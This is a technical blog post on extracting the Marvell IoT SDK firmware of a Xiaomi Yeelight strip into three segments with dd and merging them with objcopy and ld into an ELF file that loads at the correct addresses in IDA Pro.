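After going through many tutorials I picked up a few tips about the Marvell IoT SDK, summarized here for future reference. For details, see Inside The Bulb: Adventures in Reverse Engineering Smart Bulb Firmware and dustcloud. dustcloud has done a lot of work on reverse engineering Xiaomi IoT devices; the firmware of Xiaomi's Yeelight and of its smart gateway devices both use the Marvell IoT SDK. Because dustcloud provides the Yeelight firmware directly, I skipped extracting the firmware from hardware and simply downloaded it from dustcloud.

Inside The Bulb: Adventures in Reverse Engineering Smart Bulb Firmware explains how to extract the code from firmware in the Marvell IoT SDK format and merge it into an ELF file. Since it is light on details, I repeated its steps here and summarized the method.

First, a hex editor shows that the firmware is MRVL (Marvell) and that the file contains several entries describing the offset, size and address of the different "segments":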

DWORD magic;     // Always 0x2
DWORD offset;    // Offset into the file
DWORD size;      // Size of the section
DWORD address;   // Memory address where this section will be loaded
DWORD unknown;   // Probably some kind of checksum?

The raw firmware bytes are shown in the figure below:

Figure 2: firmware binary

It contains three entries, and the three "segments" can be extracted with dd:

dd if=yeelink.light.strip1.bin bs=1 skip=200 count=12824 of=s1.bin
dd if=yeelink.light.strip1.bin bs=1 skip=13024 count=299984 of=s2.bin
dd if=yeelink.light.strip1.bin bs=1 skip=313008 count=5420 of=s3.bin
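The dd arguments above come straight from the entry fields, so they can be derived mechanically. The Python sketch below assumes the five DWORDs are little-endian and stored back to back, and it expects the caller to pass bytes that start at the first entry, since the position of the entry table inside the header is not given here. The names Entry, parse_entries and dd_command are made up for illustration.

```python
import struct
from typing import List, NamedTuple


class Entry(NamedTuple):
    magic: int      # always 0x2 according to the layout above
    offset: int     # offset of the segment in the file
    size: int       # size of the segment
    address: int    # load address of the segment
    unknown: int    # possibly a checksum


ENTRY = struct.Struct("<5I")  # assumption: five little-endian 32-bit fields


def parse_entries(table: bytes, count: int) -> List[Entry]:
    """Decode count consecutive entries from bytes that start at the first entry."""
    return [Entry(*ENTRY.unpack_from(table, i * ENTRY.size)) for i in range(count)]


def dd_command(image: str, entry: Entry, out: str) -> str:
    """Render the dd invocation that extracts one segment."""
    return "dd if={} bs=1 skip={} count={} of={}".format(
        image, entry.offset, entry.size, out)


# Offsets, sizes and addresses taken from the commands in this post;
# the last field is unknown and set to 0 here.
table = b"".join(ENTRY.pack(2, off, size, addr, 0) for off, size, addr in [
    (200, 12824, 0x100000),
    (13024, 299984, 0x1f0032e0),
    (313008, 5420, 0x20000040),
])
commands = [dd_command("yeelink.light.strip1.bin", e, "s%d.bin" % (i + 1))
            for i, e in enumerate(parse_entries(table, 3))]
```

Each segment starts where the previous one ends (200 + 12824 = 13024, and 13024 + 299984 = 313008), which is a quick sanity check on the decoded entries.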

This yields three binary files, which arm-none-eabi-objcopy merges into an ELF file:

arm-none-eabi-objcopy -I binary -O elf32-littlearm --adjust-vma 0x100000 --binary-architecture arm --rename-section .data=.text,contents,alloc,load,readonly,code --add-section .text2=s2.bin --set-section-flags .text2=contents,alloc,load,readonly,code --change-section-address .text2=0x1f0032e0 --add-section .text3=s3.bin --set-section-flags .text3=contents,alloc,load,readonly,code --change-section-address .text3=0x20000040 s1.bin firmware_yeelink.elf

The command above merges the three files into one ELF file, places each in its own section, and sets its virtual address.

Loading the generated firmware_yeelink.elf directly into IDA Pro exposes a problem: the ELF file produced by objcopy is a relocatable file, so IDA shows virtual addresses starting at 0 instead of 0x100000.

I eventually found a fix: use the ld linker to turn the relocatable file into an executable file and assign a virtual address to each section:

arm-none-eabi-ld --section-start=.text=0x100000 --section-start=.text2=0x1f0032e0 --section-start=.text3=0x20000040 firmware_yeelink.elf -o firmware.elf

Loaded into IDA now, the virtual addresses are correct.

(To be continued)

References

[1] Mendez, Diego M., Ioannis Papapanagiotou, and Baijian Yang. "Internet of things: Survey on security and privacy." arXiv preprint arXiv:1707.01879 (2017).
